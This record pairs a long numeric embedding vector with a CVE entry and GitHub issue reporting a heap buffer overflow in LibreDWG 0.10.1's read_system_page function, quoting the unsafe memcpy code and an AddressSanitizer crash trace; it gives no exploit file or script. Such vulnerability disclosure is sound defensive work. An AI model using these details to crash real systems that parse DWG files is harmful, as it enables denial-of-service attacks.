0.018586643040180206, -0.016742387786507607, 0.01233346201479435, 0.004704293794929981, -0.0018766745924949646, -0.04973727837204933, -0.00749949412420392, 0.006408069282770157, 0.00004260564674041234, 0.01753484085202217, 0.023888878524303436, -0.009106013923883438, 0.008263131603598595, 0.018701909109950066, -0.00490961130708456, 0.0050464896485209465, 0.004383710213005543, -0.003746145172044635, 0.0065701622515916824, 0.00040388127672486007, 0.0308624729514122, -0.01639658957719803, -0.014163309708237648, -0.0009590491536073387, -0.003387739881873131, 0.010842208750545979, -0.0016677549574524164, -0.019321464002132416, 0.011252843774855137, 0.004340485204011202, -0.0012147956294938922, 0.006908756215125322, 0.011072739958763123, -0.02675612084567547, 0.001939710695296526, 0.016497446224093437, -0.015978749841451645, -0.027318041771650314, -0.01947995461523533, -0.007881312631070614, 0.007232941687107086, 0.025329703465104103, 0.014091269113123417, -0.011713907122612, -0.000023188278646557592, -0.019220605492591858, 0.014645986258983612, -0.012477545067667961, 0.0025466582737863064, -0.008306356146931648, 0.030660755932331085, 0.0007555326446890831, -0.0018622663337737322, -0.005802922882139683, -0.00007879512122599408, 0.009826426394283772, -0.025473786517977715, 0.02321169152855873, -0.01306828297674656, 0.02777910605072975, -0.017232267186045647, 0.00391904404386878, -0.005525563843548298, -0.01123843528330326, 0.010215449146926403, 0.0003921745519619435, -0.021554742008447647, 0.006883541587740183, -0.00429005641490221, -0.031784601509571075, 0.00887548178434372, 0.019782528281211853, 0.017217859625816345, 0.031755782663822174, 0.014264168217778206, 0.005129337310791016, 0.007225737441331148, -0.009120422415435314, -0.008969135582447052, -0.016756795346736908, -0.017578065395355225, 0.0030221305787563324, 0.027490941807627678, 0.007766047026962042, -0.004088341258466244, -0.021007228642702103, 0.013313223607838154, -0.007052838336676359, 0.012239808216691017, -0.004369301721453667, 0.024494025856256485, -0.001185078639537096, -0.018701909109950066, 0.012124543078243732, 0.028470702469348907, -0.002548459218814969, -0.00564443226903677, -0.003140998538583517, 0.010950270108878613, -0.01475404854863882, -0.0004961841041222215, -0.007780455052852631, 0.002096400363370776, -0.0024710148572921753, 0.004916815552860498, 0.004480965901166201, -0.01165627408772707, 0.009062789380550385, -0.0050464896485209465, -0.01522952038794756, 0.019580813124775887, -0.02391769550740719, -0.018298478797078133, -0.00845764297991991, 0.012196583673357964, 0.028081679716706276, -0.010806187987327576, 0.00850807223469019, 0.013522142544388771, 0.0014048044104129076, -0.0172754917293787, -0.0015443842858076096, -0.030804838985204697, 0.006616989150643349, -0.0018568632658571005, -0.015474461019039154, 0.0029248748905956745, 0.015042213723063469, 0.026208607479929924, -0.017088184133172035, 0.006544947624206543, -0.0030509470961987972, -0.01301785372197628, -0.017246674746274948, -0.00342376041226089, -0.014660394750535488, -0.009106013923883438, -0.024263493716716766, -0.009084401652216911, -0.007686801720410585, 0.0005286026862449944, 0.001005875994451344, -0.014285780489444733, 0.005082510411739349, -0.016094015911221504, -0.011620254255831242, 0.0027537767309695482, -0.004963642451912165, -0.009127626195549965, 0.03440690040588379, -0.006869133561849594, -0.010417165234684944, 0.0048051513731479645, 0.00150386116001755, 0.015287153422832489, -0.008479255251586437, 0.027188368141651154, 0.014408250339329243, -0.0141921266913414, -0.011130372993648052, 0.0017497019143775105, 0.005691258702427149, 0.00041063514072448015, 0.002951890230178833, 0.01926383003592491, 0.006440487690269947, 0.009682344272732735, -0.0019054911099374294, -0.006343232002109289, -0.0020549767650663853, 0.017851822078227997, 0.010690921917557716, 0.004272046033293009, -0.03345595672726631, -0.02921993099153042, -0.016439814120531082, -0.016872061416506767, 0.013997615315020084, -0.008018190972507, -0.008263131603598595, -0.00371732865460217, 0.00857290904968977, -0.011317680589854717, 0.02354308031499386, -0.00009055810369318351, -0.0012463136808946729, -0.01203809306025505, -0.0039010338950902224, -0.03627997264266014, 0.011180802248418331, 0.012448728084564209, -0.0026601231656968594, -0.018903624266386032, 0.002508836565539241, -0.0009428398916497827, -0.005060898140072823, 0.007917333394289017, 0.01826966181397438, -0.0015029605710878968, -0.011829173192381859, -0.015849076211452484, 0.00030820147367194295, -0.004127963911741972, 0.029940344393253326, 0.029680995270609856, -0.00858011282980442, -0.00047997484216466546, -0.00018955854466184974, 0.011857990175485611, 0.0009716564090922475, 0.005500349681824446, -0.002321529434993863, 0.001637137494981289, 0.01499898824840784, 0.0012553187552839518, 0.02169882506132126, -0.007157298270612955, -0.013623001053929329, -0.0016938699409365654, 0.002860037609934807, 0.01153380423784256, 0.0013624802231788635, -0.0011967852478846908, 0.0018838787218555808, 0.03305252641439438, -0.004761926829814911, -0.01214615534991026, -0.007211329415440559, 0.0029500892851501703, 0.016699161380529404, 0.042504336684942245, 0.002272901590913534, 0.0009045679471455514, 0.0014327203389257193, -0.0036831090692430735, 0.004970846232026815, 0.018845992162823677, -0.003684910014271736, -0.013161936774849892, 0.0031752181239426136, 0.007405840791761875, 0.008299152366816998, 0.0092573007568717, 0.02567550167441368, -0.03798014670610428, 0.01129606831818819, -0.0004826763761229813, 0.008248723112046719, -0.021525926887989044, -0.011958847753703594, -0.015964342281222343, -0.015964342281222343, 0.009178055450320244, -0.02109367772936821, -0.020185958594083786, -0.011029515415430069, 0.011036720126867294, -0.0023125242441892624, 0.012852159328758717, -0.003049145918339491, 0.02308201789855957, 0.017722148448228836, -0.02220311388373375, -0.004156780429184437, -0.035357847809791565, -0.0034147552214562893, -0.021381843835115433, 0.00395146245136857, 0.01616605743765831, -0.037807248532772064, -0.01097188238054514, -0.01564735919237137, 0.016713570803403854, -0.003274274989962578, -0.013500530272722244, -0.012124543078243732, -0.03679867088794708, -0.01605079136788845, 0.003994687460362911, 0.008673766627907753, -0.005550778470933437, -0.0027519757859408855, 0.0034615821205079556, -0.008061416447162628, -0.006753867492079735, -0.008904298767447472, -0.007164502516388893, -0.01179315336048603, -0.011079944670200348, -0.009559874422848225, -0.020085100084543228, -0.01430739276111126, -0.018428152427077293, -0.005028479266911745, -0.0034183573443442583, -0.015978749841451645, 0.0023647539783269167, -0.006897950079292059, 0.01926383003592491, -0.008219907060265541, -0.003782165702432394, -0.019811343401670456, 0.004156780429184437, -0.017678923904895782, 0.03169815242290497, 0.0005803823587484658, 0.0006803395808674395, 0.011764336377382278, -0.012232604436576366, -0.015085438266396523, 0.0007141089299693704, -0.007549923378974199, -0.008969135582447052, -0.0036272769793868065, -0.004740314558148384, -0.015762625262141228, -0.012319054454565048, 0.026496771723031998, 0.002773588290438056, -0.011627458035945892, 0.016756795346736908, -0.011908418498933315, -0.025027131661772728, -0.011144781485199928, 0.013197957538068295, -0.006804296281188726, -0.010417165234684944, 0.014156105928122997, -0.015849076211452484, -0.00893311481922865, 0.0053922878578305244, -0.008155069313943386, 0.006501723080873489, -0.021929357200860977, -0.021670008078217506, -0.011843581683933735, -0.013226773589849472, -0.02357189729809761, 0.01091424934566021, 0.008227110840380192, 0.008147865533828735, 0.0042756483890116215, -0.0017028751317411661, 0.0062387725338339806, 0.004408924374729395, 0.008363989181816578, -0.0015903105959296227, 0.0021468293853104115, 0.0032292490359395742, 0.023744797334074974, 0.006980797275900841, -0.02468133345246315, -0.024738965556025505, 0.012722484767436981, -0.0038001760840415955, -0.002769986167550087, 0.003157207742333412, -0.009451812133193016, 0.019278239458799362, 0.007110471371561289, -0.008601725101470947, 0.011195210739970207, -0.0197537112981081, -0.010835004039108753, -0.015460052527487278, 0.0021360230166465044, 0.021367434412240982, 0.009898467920720577, -0.0016425405628979206, 0.004729507956653833, 0.003641685238108039, -0.018471376970410347, 0.003092370694503188, -0.005464328918606043, 0.0068727354519069195, -0.0071681044064462185, -0.02825457975268364, -0.01677120290696621, -0.01283775083720684, 0.024494025856256485, 0.010979087091982365, 0.008680970408022404, -0.006890745833516121, -0.01023706141859293, 0.007009613793343306, 0.006969991140067577, -0.014970172196626663, 0.004823161754757166, 0.029162298887968063, -0.01577703468501568, -0.015820259228348732, -0.011713907122612, 0.018197620287537575, 0.003290484193712473, 0.01937909610569477, 0.00037101245834492147, -0.00044350395910441875, -0.00573448371142149, 0.0345221683382988, 0.02825457975268364, -0.008176682516932487, 0.018802767619490623, 0.01345730572938919, -0.02194376476109028, -0.012499157339334488, -0.015243928879499435, -0.007910129614174366, 0.023643938824534416, 0.004607038106769323, 0.003742543049156666, -0.01253517810255289, -0.009711160324513912, 0.018428152427077293, 0.01276571024209261, -0.02070465497672558, -0.0048807947896420956, -0.018903624266386032, 0.006411671172827482, 0.01628132350742817, -0.016958510503172874, 0.016108423471450806, -0.008234314620494843, 0.004308066796511412, 0.005089714657515287, 0.006642203312367201, -0.020171551033854485, -0.006721448618918657, -0.021886132657527924, 0.008003783412277699, -0.03158288449048996, -0.013125916011631489, -0.03282199427485466, 0.0032760759349912405, 0.015330377966165543, -0.012261421419680119, -0.011051127687096596, 0.0031788202468305826, -0.01226862519979477, 0.035818912088871, -0.041034698486328125, -0.01430739276111126, -0.0024421983398497105, -0.000044350395910441875, 0.007823679596185684, 0.013644613325595856, 0.0035336234141141176, -0.0017713143024593592, -0.014638782478868961, -0.0001269727072212845, -0.006307211704552174, -0.02035885863006115, -0.002480020048096776, 0.03233211487531662, 0.002382764359936118, -0.017073776572942734, 0.008911502547562122, -0.0114185381680727, -0.024004144594073296, 0.004790743347257376, -0.019840160384774208, -0.031035371124744415, 0.013219569809734821, -0.016324548050761223, 0.0002665526408236474, -0.002516040811315179, -0.011584233492612839, -0.012794526293873787, -0.010064163245260715, 0.01425696350634098, -0.005903780460357666, 0.014696415513753891, 0.007982171140611172, -0.011584233492612839, 0.025574645027518272, -0.01017222460359335, -0.006807898171246052, -0.002915869699791074, 0.02296675182878971, -0.014883722178637981, -0.000015393188732559793, -0.020647022873163223, -0.004938427824527025, -0.022678585723042488, 0.026583222672343254, 0.017693331465125084, 0.02208784781396389, -0.005723677575588226, -0.00019856370636262, -0.020315632224082947, 0.0041639842092990875, -0.0037749616894870996, 0.001041896641254425, 0.001467840513214469, -0.0005475135403685272, -0.010136203840374947, -0.026929019019007683, -0.0031590089201927185, -0.015388011001050472, 0.011951643973588943, 0.022894710302352905, -0.003274274989962578, 0.007794863544404507, -0.012182176113128662, 0.016252506524324417, 0.004700691904872656, -0.016843244433403015, 0.014220942743122578, -0.01875954121351242, 0.029565729200839996, -0.0043981182388961315, -0.007413044571876526, -0.01406965684145689, 0.010698125697672367, -0.003402148140594363, -0.0333406925201416, 0.0003367928438819945, -0.005064500030130148, 0.0038325944915413857, -0.0061631291173398495, 0.0018397534731775522, -0.00044462960795499384, 0.01717463508248329, 0.010892637073993683, 0.007657985202968121, -0.00012719783990178257, 0.0064729065634310246, 0.017433982342481613, -0.0050464896485209465, -0.0022638964001089334, -0.007737230509519577, -0.0086305420845747, -0.004254036117345095, 0.0030743603128939867, -0.025517011061310768, 0.004938427824527025, -0.0050536938942968845, -0.0059902300126850605, 0.0051077245734632015, 0.010337919928133488, 0.02404736913740635, -0.007578739896416664, -0.020949596539139748, 0.002395371673628688, 0.0055219619534909725, 0.018845992162823677, -0.0008307257085107267, 0.020142734050750732, 0.01580584980547428, 0.016252506524324417, 0.00743465730920434, 0.013104303739964962, -0.013543755747377872, -0.008061416447162628, -0.021295394748449326, 0.0006402666331268847, 0.009689548052847385, -0.001812738017179072, -0.0012283032992854714, 0.012931404635310173, 0.02762061543762684, -0.005284226033836603, 0.008601725101470947, -0.017246674746274948, -0.020315632224082947, -0.014365025795996189, 0.015157479792833328, -0.014768457040190697, -0.013932778500020504, -0.004603436216711998, 0.009653527289628983, -0.003281479002907872, 0.004470159765332937, 0.0012418110854923725, -0.01537360344082117, -0.0029122675769031048, 0.006948378868401051, -0.0037965739611536264, -0.006148720625787973, 0.01592111587524414, 0.0029987171292304993, -0.0017424977850168943, 0.018312886357307434, 0.013738267123699188, 0.005150949582457542, 0.010121796280145645, -0.007542719133198261, 0.015215112827718258, -0.00042954596574418247, -0.020056284964084625, -0.009106013923883438, 0.0038686152547597885, 0.0259060338139534, -0.009286117739975452, -0.027591800317168236, -0.005006866995245218, -0.00031450510141439736, -0.0023611520882695913, -0.0031031768303364515, 0.015560910105705261, 0.013939982280135155, 0.01704495958983898, 0.034867964684963226, 0.009069993160665035, 0.005565186496824026, -0.03478151559829712, 0.007016818039119244, 0.004300862550735474, -0.001679461682215333, -0.017001735046505928, -0.01888921670615673, 0.0041099535301327705, 0.021799683570861816, 0.005633625667542219, -0.018456969410181046, 0.009653527289628983, 0.008666562847793102, -0.003706522285938263, -0.010813391767442226, 0.0028528335969895124, -0.006213557906448841, -0.011252843774855137, 0.0144874956458807, 0.008846665732562542, -0.029464872553944588, -0.010013733990490437, -0.018802767619490623, -0.011425742879509926, 0.0025268469471484423, 0.0041711884550750256, -0.018831582739949226, 0.013097099959850311, -0.003101375885307789, 0.02096400409936905, -0.03887346014380455, 0.004761926829814911, 0.015330377966165543, -0.03184223175048828, -0.024105003103613853, -0.01375267468392849, -0.009451812133193016, -0.006332425866276026, 0.0036506904289126396, 0.01159143727272749, -0.014746843837201595, 0.0052950321696698666, -0.0026024901308119297, 0.008623337373137474, 0.005179766099900007, 0.008623337373137474, 0.013154732994735241, -0.011432946659624577, -0.02740449272096157, -0.002701546996831894, 0.020402083173394203, -0.017794189974665642, 0.001253517810255289, -0.0035138120874762535, 0.022116664797067642, 0.009278913028538227, 0.011930031701922417, -0.01165627408772707, -0.011368109844624996, -0.011180802248418331, -0.024263493716716766, 0.0003102276532445103, -0.0017911256290972233, 0.005410297773778439, 0.01029469445347786, -0.005835341289639473, -0.01363740861415863, 0.0034489750396460295, 0.005385083612054586, -0.006436885800212622, -0.0016290327766910195, 0.012232604436576366, 0.0007006012019701302, 0.01029469445347786, 0.010129000060260296, 0.003004120197147131, 0.022995566949248314, 0.005457124672830105, -0.0050464896485209465, -0.014883722178637981, -0.024105003103613853, 0.005716473329812288, 0.018442559987306595, -0.012066910043358803, -0.019551996141672134, -0.0009617506875656545, -0.021151311695575714, 0.0104964105412364, -0.0016263312427327037, -0.019148563966155052, 0.004372904077172279, 0.008853869512677193, -0.00607307767495513, -0.021036045625805855, 0.004545803181827068, 0.0026367097161710262, 0.019292647019028664, 0.0037353388033807278, -0.024349942803382874, 0.023168466985225677, 0.0022837077267467976, -0.005104122683405876, -0.001431819866411388, -0.01073414646089077, 0.011303272098302841, 0.013500530272722244, 0.011836377903819084, -0.006346834357827902, -0.003032936714589596, -0.027361268177628517, 0.019191790372133255, 0.005309440195560455, -0.0018874808447435498, -0.003166212933138013, -0.004300862550735474, 0.023528672754764557, -0.01091424934566021, 0.01949436217546463, 0.01066930964589119, 0.0052950321696698666, -0.010445981286466122, -0.01221819594502449, 0.014718027785420418, 0.011317680589854717, 0.02394651249051094, -0.016310138627886772, -0.0028528335969895124, -0.011339292861521244, -0.009595895186066628, 0.01664152927696705, 0.000006215668690856546, 0.012614423409104347, -0.013723858632147312, -0.010871024802327156, -0.016972918063402176, -0.0008973638177849352, -0.008680970408022404, -0.024018554016947746, -0.00466106878593564, -0.01740516722202301, 0.0197393037378788, -0.002033364260569215, -0.0066458056680858135, -0.0172754917293787, 0.013990411534905434, 0.010258674621582031, -0.018932441249489784, 0.0041099535301327705, -0.0031464016065001488, 0.0021414263173937798, 0.009026768617331982, -0.007571535650640726, -0.010445981286466122, 0.010157816112041473, -0.005795718636363745, -0.013788695447146893, -0.010654901154339314, -0.019033297896385193, -0.0025304490700364113, -0.02210225537419319, -0.0038217883557081223, 0.002060379832983017, 0.0018442560685798526, 0.017794189974665642, 0.004228821489959955, 0.027966413646936417, 0.01590670831501484, -0.008003783412277699, -0.0007492290460504591, 0.0025502603966742754, 0.009826426394283772, -0.01492694765329361, -0.012974629178643227, -0.001149057992734015, -0.014840497635304928, -0.0013624802231788635, 0.005738085601478815, 0.0197537112981081, 0.028052862733602524, 0.013997615315020084, -0.007506698369979858, 0.002112609799951315, -0.002456606598570943, 0.002604291308671236, 0.009286117739975452, 0.013550959527492523, 0.008111844770610332, 0.0028240170795470476, 0.023168466985225677, 0.0029482883401215076, 0.0027609809767454863, 0.003911839798092842, 0.011742724105715752, -0.013939982280135155, -0.006346834357827902, -0.0011760734487324953, 0.005968617741018534, 0.0026709293015301228, 0.0023611520882695913, -0.01191562321037054, 0.020574981346726418, 0.024335535243153572, -0.007744434755295515, 0.010013733990490437, -0.00724374782294035, -0.011821969412267208, 0.015416827984154224, -0.014725231565535069, 0.00796055793762207, 0.010186633095145226, 0.0024530047085136175, 0.00994169246405363, -0.003756951307877898, -0.007060042582452297, 0.009567078202962875, 0.002036966383457184, -0.03342714160680771, -0.022059030830860138, -0.0037605534307658672, 0.012491952627897263, -0.01153380423784256, -0.004239627625793219, 0.000540309411007911, -0.002103604609146714, 0.008536888286471367, -0.002213467378169298, 0.0032022336963564157, -0.016007566824555397, 0.02272181026637554, 0.020776696503162384, -0.006184741389006376, 0.020502939820289612, 0.022548912093043327, -0.023053200915455818, 0.008407213725149632, -0.008882686495780945, 0.0222319308668375, 0.0017451993189752102, -0.018284069374203682, -0.0057633002288639545, 0.012967425398528576, -0.01146896742284298, -0.00420000497251749, 0.002629505703225732, 0.004679079167544842, 0.01363740861415863, 0.017059369012713432, 0.0006479209987446666, 0.003104978008195758, 0.010201041586697102, -0.036452874541282654, 0.004646660760045052, -0.0026565210428088903, 0.0043368833139538765, -0.005579594988375902, 0.020315632224082947, -0.004862784408032894, -0.0006974493735469878, 0.009170851670205593, 0.01216056291013956, -0.007982171140611172, 0.025027131661772728, -0.014473087154328823, 0.009019564837217331, -0.017967088147997856, 0.012182176113128662, -0.0030023192521184683, 0.015618543140590191, 0.0046394565142691135, 0.01741957478225231, -0.017722148448228836, -0.009221279993653297, 0.01861546002328396, 0.00727616623044014, -0.0031914275605231524, -0.018053537234663963, 0.018961258232593536, -0.012607218697667122, 0.0049852547235786915, -0.0004124361730646342, 0.0049852547235786915, -0.0011985863093286753, -0.008666562847793102, -0.01704495958983898, 0.004466557409614325, -0.0014246157370507717, 0.016137240454554558, -0.0066386014223098755, 0.023355774581432343, 0.014941355213522911, 0.015964342281222343, -0.012167767621576786, 0.008363989181816578, 0.005831739399582148, -0.009552669711411, -0.010251469910144806, -0.026093341410160065, -0.0035174142103642225, 0.01590670831501484, 0.011007903143763542, 0.021569151431322098, 0.02739008329808712, 0.004942029714584351, -0.012355074286460876, -0.005122133065015078, -0.0036020625848323107, -0.002742970595136285, 0.011735520325601101, 0.0008518878021277487, 0.005442716646939516, -0.015330377966165543, 0.013659020885825157, -0.01566176861524582, -0.018456969410181046, 0.015272744931280613, 0.005385083612054586, -0.008623337373137474, 0.026597630232572556, 0.030055610463023186, 0.005900178570300341, 0.023341365158557892, -0.004236025735735893, -0.011966051533818245, 0.004376505967229605, 0.020272407680749893, 0.02308201789855957, 0.017549248412251472, 0.008544092066586018, -0.008659358136355877, -0.01135370135307312, 0.01864427514374256, 0.019595220685005188, 0.006973593030124903, 0.010453185997903347, -0.011151986196637154, -0.012405503541231155, 0.00796055793762207, 0.0049852547235786915, 0.03181341663002968, 0.001403003348968923, -0.007974966429173946, -0.006372048519551754, -0.02566109411418438, 0.009300525300204754, 0.024738965556025505, 0.00040072944830171764, -0.004945632070302963, -0.012808934785425663, 0.013471714220941067, -0.0005042887642048299, -0.03129471838474274, 0.012996241450309753, -0.004160382319241762, -0.014674803242087364, 0.001751502975821495, -0.0016524462262168527, 0.0009149239049293101, 0.004646660760045052, -0.01350773498415947, -0.012247012928128242, 0.01652626320719719, 0.011188006028532982, -0.009113218635320663, -0.013464509509503841, 0.007319391239434481, -0.028571560978889465, -0.017477206885814667, 0.016094015911221504, -0.002721358323469758, -0.008270335383713245, -0.013226773589849472, 0.008702583611011505, -0.02109367772936821, 0.01923501491546631, -0.02762061543762684, 0.017678923904895782, -0.0069339703768491745, -0.0302285086363554, -0.02234719693660736, -0.023643938824534416, -0.010078570805490017, 0.0031806211918592453, 0.010035346262156963, 0.008644950576126575, -0.02848511002957821, -0.0066926321014761925, 0.005810127127915621, -0.00737702427431941, 0.017462799325585365, -0.025012722238898277, -0.006191945634782314, 0.013442897237837315, -0.031064188107848167, 0.001185078639537096, 0.011166393756866455, 0.007585943676531315, -0.009783201850950718, 0.020430898293852806, -0.004534996580332518, 0.013716653920710087, -0.00796055793762207, -0.0057633002288639545, 0.009552669711411, 0.0017938271630555391, 0.02678493782877922, -0.015460052527487278, 0.0006010942161083221, 0.0037353388033807278, 0.014581149443984032, 0.00026925417478196323, 0.004534996580332518, 0.0022548912093043327, -0.0014561337884515524, 0.0026619243435561657, 0.005449920892715454, -0.006379252765327692, -0.007564331404864788, -0.011252843774855137, 0.010633288882672787, 0.002389968605712056, -0.009531057439744473, 0.004823161754757166, 0.0056948610581457615, 0.034234002232551575, -0.0018964859191328287, 0.00006832662620581686, 0.0197393037378788, 0.007078052964061499, 0.004970846232026815, -0.0029735027346760035, -0.004689885303378105, 0.0032634686212986708, -0.018658684566617012, -0.004084738902747631, -0.016511855646967888, -0.0009563476196490228, -0.022995566949248314, -0.012744097039103508, 0.0015551905380561948, 0.0049348259344697, -0.008608929812908173, -0.007621964439749718, 0.012203788384795189, -0.004844774026423693, 0.01838492788374424, 0.012967425398528576, 0.013853532262146473, -0.0035390264820307493, -0.01887480728328228, 0.009163646958768368, 0.018341703340411186, 0.027952006086707115, 0.024494025856256485, 0.003335509914904833, 0.013889553025364876, -0.013860736973583698, -0.005572390742599964, 0.013471714220941067, -0.013125916011631489, -0.007391432300209999, 0.0054535227827727795, -0.019969835877418518, -0.024004144594073296, -0.003668700810521841, 0.017851822078227997, 0.01937909610569477, -0.000251468998612836, 0.0035300212912261486, -0.012909792363643646, 0.000032052728784037754, 0.01537360344082117, 0.008565705269575119, 0.01350773498415947, -0.0003370179911144078, 0.006739459000527859, 0.0005394088802859187, -0.02009950950741768, -0.01345010194927454, 0.04890160262584686, 0.003991085570305586, 0.0038722173776477575, 0.026986652985215187, -0.01717463508248329, -0.005190572235733271, -0.00987685564905405, 0.009747181087732315, -0.008500867523252964, 0.009264504536986351, 0.009502241387963295, 0.005882168188691139, 0.010071367025375366, -0.0011184404138475657, -0.008810644969344139, 0.0011238434817641973, -0.0013543755048885942, 0.0006546748918481171, -0.0012283032992854714, -0.015719400718808174, -0.01443706639111042, -0.004246831871569157, 0.01270807720720768, -0.008068620227277279, 0.006393661256879568, 0.008155069313943386, -0.005907382816076279, -0.008997952565550804, 0.006235170178115368, -0.012866567820310593, 0.0296233631670475, -0.013435693457722664, -0.003847002750262618, 0.011072739958763123, 0.00675746938213706, 0.014732436276972294, 0.002795200562104583, 0.02507035620510578, 0.015200704336166382, -0.008227110840380192, 0.011332089081406593, 0.007312186993658543, -0.0017875235062092543, -0.013709450140595436, 0.009545465931296349, -0.018456969410181046, 0.0008771022548899055, -0.00635403860360384, 0.004174790345132351, 0.019191790372133255, 0.009884059429168701, 0.017981495708227158, -0.007398636545985937, 0.019292647019028664, -0.000880254025105387, 0.011670682579278946, 0.0018820776604115963, -0.016439814120531082, -0.0052193887531757355, -0.000491681566927582, -0.007031226065009832, -0.016353365033864975, -0.02197258174419403, -0.021770866587758064, -0.02074788138270378, -0.0006533241248689592, 0.00049303233390674, 0.012909792363643646, -0.003205835586413741, 0.022635361179709435, 0.000545262242667377, -0.009833631105720997, -0.02185731567442417, 0.0066926321014761925, -0.00992728490382433, -0.018212027847766876, 0.013442897237837315, 0.002035165438428521, 0.011375313624739647, -0.00975438579916954, 0.0185146015137434, -0.001943312818184495, 0.003688512137159705, 0.0058173309080302715, -0.0015407822793349624, -0.009264504536986351, -0.02110808715224266, -0.010820595547556877, -0.016612712293863297, 0.01799590513110161, 0.002350345952436328, 0.0289749912917614, -0.013911165297031403, -0.028225762769579887, 0.013529347255825996, -0.01283054705709219, 0.020315632224082947, -0.003753349184989929, 0.0027051488868892193, 0.008544092066586018, 0.026453547179698944, 0.006220762152224779, -0.025228846818208694, -0.009480629116296768, 0.016468629240989685, 0.005716473329812288, 0.0033661273773759604, -0.0011769739212468266, -0.017967088147997856, 0.010921454057097435, 0.012110134586691856, -0.0012697270140051842, -0.016194872558116913, 0.008486459031701088, 0.02404736913740635, 0.01950877159833908, -0.0032526624854654074, 0.011879602447152138, 0.015344786457717419, 0.004844774026423693, -0.004380108322948217, 0.010028142482042313, 0.02567550167441368, 0.017477206885814667, 0.021511517465114594, -0.013406877405941486, -0.0013390667736530304, 0.02790878154337406, -0.0011985863093286753, 0.016122832894325256, 0.008673766627907753, -0.004362097941339016, 0.02357189729809761, 0.0024530047085136175, -0.0006362143321894109, 0.011432946659624577, -0.02047412283718586, 0.026554405689239502, 0.010453185997903347, -0.0006614287267439067, 0.005331052467226982, 0.057085487991571426, -0.01739075779914856, 0.0008064117864705622, -0.018312886357307434, 0.02022918313741684, -0.009502241387963295, 0.01714581809937954, -0.0302285086363554, -0.016814427450299263, -0.0033841377589851618, 0.01265044417232275, 0.0023647539783269167, -0.0023089221213012934, -0.010892637073993683, -0.007874108850955963, -0.0024421983398497105, 0.011555416509509087, -0.0007960558286868036, 0.0054535227827727795, -0.0035462307278066874, 0.002024359069764614, 0.008436030708253384, 0.007319391239434481, 0.003358923364430666, 0.01153380423784256, 0.010287490673363209, -0.015272744931280613, 0.008644950576126575, 0.00018483083113096654, -0.0197537112981081, -0.014026431366801262, -0.01214615534991026, 0.002271100413054228, 0.013061079196631908, 0.013824716210365295, 0.013435693457722664, -0.013839124701917171, 0.012628830969333649, 0.011749927885830402, 0.016598304733633995, 0.007391432300209999, -0.008313560858368874, 0.02776469849050045, 0.050054263323545456, 0.004862784408032894, -0.0010274883825331926, 0.003216641955077648, 0.014278575778007507, 0.015704993158578873, -0.005554380360990763, -0.002978905802592635, 0.0141921266913414, 0.00032846309477463365, -0.008702583611011505, 0.029162298887968063, 0.004311668686568737, -0.0012355074286460876, 0.05071704089641571, -0.0018037328263744712, 0.0011805760441347957, -0.034378085285425186, 0.004326077178120613, 0.008421622216701508 ]
3,040
CVE-2020-23861
2021-05-18T16:15:07.497000
A heap-based buffer overflow vulnerability exists in LibreDWG 0.10.1 via the read_system_page function at libredwg-0.10.1/src/decode_r2007.c:666:5, which causes a denial of service by submitting a dwg file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/248" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.10.1:*:*:*:*:*:*:*", "matchCriteriaId": "66367632-FED7-46AB-8C8F-864603ABD73C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/248
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
LibreDWG "read_system_page" function heap overflow vulnerability Description: There is a heap overflow bug in "read_system_page" function at libredwg-0.10.1/src/decode_r2007.c:666:5 An attacker can exploit this bug to cause a Denial of Service (DoS) by submitting a dwg file. This bug is caused by the following dangerous memcpy calling in read_system_page function: line 666 if (size_comp < size_uncomp)     error = decompress_r2007 (data, size_uncomp, pedata, MIN (pedata_size, size_comp));   else     memcpy (data, pedata, size_uncomp);   free (pedata); We used AddressSanitizer instrumented in LibreDWG and triggered this bug, the asan output as follows: ==2593==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000031 at pc 0x0000004e7e12 bp 0x7ffd91a390c0 sp 0x7ffd91a38870 READ of size 96 at 0x602000000031 thread T0 #0 0x4e7e11 in __asan_memcpy /root/Download/llvm-8.0.0.src/projects/compiler-rt-8.0.0.src/lib/asan/asan_interceptors_memintrinsics.cc:23 #1 0x7f131338293e in read_system_page /root/libredwg-0.10.1/src/decode_r2007.c:666:5 #2 0x7f131336bc15 in read_pages_map /root/libredwg-0.10.1/src/decode_r2007.c:1014:10 #3 0x7f131336bc15 in read_r2007_meta_data /root/libredwg-0.10.1/src/decode_r2007.c:1814 #4 0x7f1312f9bc84 in decode_R2007 /root/libredwg-0.10.1/src/decode.c:3016:11 #5 0x7f1312f9bc84 in dwg_decode /root/libredwg-0.10.1/src/decode.c:241 #6 0x7f1312f7922f in dwg_read_file /root/libredwg-0.10.1/src/dwg.c:211:11 #7 0x52c287 in main /root/libredwg-0.10.1/programs/dwg2dxf.c:255:15 #8 0x7f1311da1b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #9 0x41add9 in _start 